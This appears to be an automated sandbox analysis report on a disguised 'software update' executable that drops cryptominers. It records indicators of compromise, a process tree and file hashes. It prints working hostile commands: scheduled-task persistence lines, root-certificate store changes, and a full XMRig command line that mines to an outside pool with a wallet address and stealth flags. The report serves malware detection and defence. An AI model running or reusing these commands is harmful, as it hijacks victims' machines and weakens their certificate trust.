Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
18-07-2021 23:59
Static task
static1
Behavioral task
behavioral1
Sample
Software updated v2.6.0.exe
Resource
win7v20210408
General
-
Target
Software updated v2.6.0.exe
-
Size
256KB
-
MD5
18d05e20731583a22b495d0d1f107c5b
-
SHA1
2ced0e3577063ca3613b43661e7df5bc1411ab09
-
SHA256
b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae
-
SHA512
36e73454b0d74088fb39dbec77c45c4106908dc80efc6a0ac8247a538345b4224f3f5e0cf6b39cf8c1687ddcee58ac2e6f24b735c9b9e277c7d064fd82e7a65a
Malware Config
Signatures
-
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/1256-119-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/1256-120-0x00000001402EB66C-mapping.dmp xmrig behavioral1/memory/1256-122-0x0000000140000000-0x0000000140758000-memory.dmp xmrig -
Executes dropped EXE 6 IoCs
Processes:
xmrmine.exeetcmin.exertksmbs.exeserverpatch.exesihost32.exesihost64.exepid process 1320 xmrmine.exe 1128 etcmin.exe 1744 rtksmbs.exe 1940 serverpatch.exe 2008 sihost32.exe 1004 sihost64.exe -
Loads dropped DLL 6 IoCs
Processes:
Software updated v2.6.0.exeetcmin.exexmrmine.exertksmbs.exeserverpatch.exepid process 1820 Software updated v2.6.0.exe 1820 Software updated v2.6.0.exe 1128 etcmin.exe 1320 xmrmine.exe 1744 rtksmbs.exe 1940 serverpatch.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
serverpatch.exedescription pid process target process PID 1940 set thread context of 1256 1940 serverpatch.exe explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1460 schtasks.exe 780 schtasks.exe 512 schtasks.exe 812 schtasks.exe -
Processes:
rtksmbs.exeserverpatch.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 rtksmbs.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a rtksmbs.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a rtksmbs.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a rtksmbs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 rtksmbs.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 rtksmbs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 serverpatch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c51900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 serverpatch.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
etcmin.exexmrmine.exertksmbs.exeserverpatch.exepid process 1128 etcmin.exe 1320 xmrmine.exe 1744 rtksmbs.exe 1940 serverpatch.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
etcmin.exexmrmine.exertksmbs.exeserverpatch.exeexplorer.exedescription pid process Token: SeDebugPrivilege 1128 etcmin.exe Token: SeDebugPrivilege 1320 xmrmine.exe Token: SeDebugPrivilege 1744 rtksmbs.exe Token: SeDebugPrivilege 1940 serverpatch.exe Token: SeLockMemoryPrivilege 1256 explorer.exe Token: SeLockMemoryPrivilege 1256 explorer.exe -
Suspicious use of WriteProcessMemory 60 IoCs
Processes:
Software updated v2.6.0.exeetcmin.exexmrmine.execmd.execmd.exertksmbs.execmd.exeserverpatch.execmd.exedescription pid process target process PID 1820 wrote to memory of 1320 1820 Software updated v2.6.0.exe xmrmine.exe PID 1820 wrote to memory of 1320 1820 Software updated v2.6.0.exe xmrmine.exe PID 1820 wrote to memory of 1320 1820 Software updated v2.6.0.exe xmrmine.exe PID 1820 wrote to memory of 1320 1820 Software updated v2.6.0.exe xmrmine.exe PID 1820 wrote to memory of 1128 1820 Software updated v2.6.0.exe etcmin.exe PID 1820 wrote to memory of 1128 1820 Software updated v2.6.0.exe etcmin.exe PID 1820 wrote to memory of 1128 1820 Software updated v2.6.0.exe etcmin.exe PID 1820 wrote to memory of 1128 1820 Software updated v2.6.0.exe etcmin.exe PID 1128 wrote to memory of 1060 1128 etcmin.exe cmd.exe PID 1128 wrote to memory of 1060 1128 etcmin.exe cmd.exe PID 1128 wrote to memory of 1060 1128 etcmin.exe cmd.exe PID 1320 wrote to memory of 432 1320 xmrmine.exe cmd.exe PID 1320 wrote to memory of 432 1320 xmrmine.exe cmd.exe PID 1320 wrote to memory of 432 1320 xmrmine.exe cmd.exe PID 1060 wrote to memory of 1460 1060 cmd.exe schtasks.exe PID 1060 wrote to memory of 1460 1060 cmd.exe schtasks.exe PID 1060 wrote to memory of 1460 1060 cmd.exe schtasks.exe PID 432 wrote to memory of 780 432 cmd.exe schtasks.exe PID 432 wrote to memory of 780 432 cmd.exe schtasks.exe PID 432 wrote to memory of 780 432 cmd.exe schtasks.exe PID 1128 wrote to memory of 1744 1128 etcmin.exe rtksmbs.exe PID 1128 wrote to memory of 1744 1128 etcmin.exe rtksmbs.exe PID 1128 wrote to memory of 1744 1128 etcmin.exe rtksmbs.exe PID 1320 wrote to memory of 1940 1320 xmrmine.exe serverpatch.exe PID 1320 wrote to memory of 1940 1320 xmrmine.exe serverpatch.exe PID 1320 wrote to memory of 1940 1320 xmrmine.exe serverpatch.exe PID 1744 wrote to memory of 1200 1744 rtksmbs.exe cmd.exe PID 1744 wrote to memory of 1200 1744 rtksmbs.exe cmd.exe PID 1744 wrote to memory of 1200 1744 rtksmbs.exe cmd.exe PID 1200 wrote to memory of 512 1200 cmd.exe schtasks.exe PID 1200 wrote to memory of 512 1200 cmd.exe schtasks.exe PID 1200 wrote to memory of 512 1200 cmd.exe schtasks.exe PID 1744 wrote to memory of 2008 1744 rtksmbs.exe sihost32.exe PID 1744 wrote to memory of 2008 1744 rtksmbs.exe sihost32.exe PID 1744 wrote to memory of 2008 1744 rtksmbs.exe sihost32.exe PID 1940 wrote to memory of 1156 1940 serverpatch.exe cmd.exe PID 1940 wrote to memory of 1156 1940 serverpatch.exe cmd.exe PID 1940 wrote to memory of 1156 1940 serverpatch.exe cmd.exe PID 1940 wrote to memory of 1004 1940 serverpatch.exe sihost64.exe PID 1940 wrote to memory of 1004 1940 serverpatch.exe sihost64.exe PID 1940 wrote to memory of 1004 1940 serverpatch.exe sihost64.exe PID 1156 wrote to memory of 812 1156 cmd.exe schtasks.exe PID 1156 wrote to memory of 812 1156 cmd.exe schtasks.exe PID 1156 wrote to memory of 812 1156 cmd.exe schtasks.exe PID 1940 wrote to memory of 1256 1940 serverpatch.exe explorer.exe PID 1940 wrote to memory of 1256 1940 serverpatch.exe explorer.exe PID 1940 wrote to memory of 1256 1940 serverpatch.exe explorer.exe PID 1940 wrote to memory of 1256 1940 serverpatch.exe explorer.exe PID 1940 wrote to memory of 1256 1940 serverpatch.exe explorer.exe PID 1940 wrote to memory of 1256 1940 serverpatch.exe explorer.exe PID 1940 wrote to memory of 1256 1940 serverpatch.exe explorer.exe PID 1940 wrote to memory of 1256 1940 serverpatch.exe explorer.exe PID 1940 wrote to memory of 1256 1940 serverpatch.exe explorer.exe PID 1940 wrote to memory of 1256 1940 serverpatch.exe explorer.exe PID 1940 wrote to memory of 1256 1940 serverpatch.exe explorer.exe PID 1940 wrote to memory of 1256 1940 serverpatch.exe explorer.exe PID 1940 wrote to memory of 1256 1940 serverpatch.exe explorer.exe PID 1940 wrote to memory of 1256 1940 serverpatch.exe explorer.exe PID 1940 wrote to memory of 1256 1940 serverpatch.exe explorer.exe PID 1940 wrote to memory of 1256 1940 serverpatch.exe explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Software updated v2.6.0.exe"C:\Users\Admin\AppData\Local\Temp\Software updated v2.6.0.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\xmrmine.exeC:\Users\Admin\AppData\Roaming\xmrmine.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\appdata\roaming\serverpatch.exe"C:\Users\Admin\appdata\roaming\serverpatch.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"4⤵
- Executes dropped EXE
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-stealth4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\etcmin.exeC:\Users\Admin\AppData\Roaming\etcmin.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\appdata\roaming\rtksmbs.exe"C:\Users\Admin\appdata\roaming\rtksmbs.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"4⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015MD5
2902de11e30dcc620b184e3bb0f0c1cb
SHA15d11d14a2558801a2688dc2d6dfad39ac294f222
SHA256e6a7f1f8810e46a736e80ee5ac6187690f28f4d5d35d130d410e20084b2c1544
SHA512efd415cde25b827ac2a7ca4d6486ce3a43cdcc1c31d3a94fd7944681aa3e83a4966625bf2e6770581c4b59d05e35ff9318d9adaddade9070f131076892af2fa0
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB5E2F83CE9B8330B0590B7CD2E5FF2EMD5
d474de575c39b2d39c8583c5c065498a
SHA15fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25
SHA2567431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf
SHA5127b9cf079b9769dfa9eb2e28cf5a4da9922b0f80e415097d326bf20547505a6ab1b7ac6a83846d0b8253e9168b1f915b8974aec844a9b31c3adcab3aec89fcd07
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015MD5
68f912b28b2ac15bb26deb4418630163
SHA13219940d8711fcc3cfb87384b9d9d2c241228421
SHA2563abab11d81177160dfe7e69768ed0edcc4252e016b8819327a640e63dc8e7a06
SHA512b32ad169a06dc031b054c66ef402802ff8a5f670ab7d32453d4045f9efe68d80c313f1f3360ee3c039d3858b17dfd7e9415405ff442c5e0c66c626ed3c9a313b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB5E2F83CE9B8330B0590B7CD2E5FF2EMD5
eff63d3f4d1231469f0797bf51e5bc10
SHA1c1e690217f17a8151a4a30bc18b8793730f945ce
SHA256728ae83f52771f100e07d93da68b2a21f9aaa1bf634643ec1f596fcb98cb88c1
SHA5128884da2b96bb26c6cdd436c8d45e29c2b0029389d7ee49a4dbdd0eedeb2b6f1da251c71e08bc95e6007969b3c7470ea2460a6177dc3e9635fb1ddda10056b9ca
-
C:\Users\Admin\AppData\Roaming\Microsoft\libs\sihost64.exeMD5
f20a5085dbb85927b25ed46a45fe0a13
SHA141b351e45a7be1d6c6c6918ee65b00f5d69ff787
SHA256370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235
SHA5124cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f
-
C:\Users\Admin\AppData\Roaming\Microsoft\telemetry\sihost32.exeMD5
e149663730c0b03c8936baffe9645bb4
SHA1c0fb146c35d48481df4149027953e4ab7be59e95
SHA25633225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469
SHA512553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe
-
C:\Users\Admin\AppData\Roaming\etcmin.exeMD5
406f2550d0d4b9b3e2f47994076e8b8b
SHA101ab414c9d14ef6a10cd1f3c815e2d63ace18822
SHA2564805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
SHA51273b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4
-
C:\Users\Admin\AppData\Roaming\etcmin.exeMD5
406f2550d0d4b9b3e2f47994076e8b8b
SHA101ab414c9d14ef6a10cd1f3c815e2d63ace18822
SHA2564805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
SHA51273b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4
-
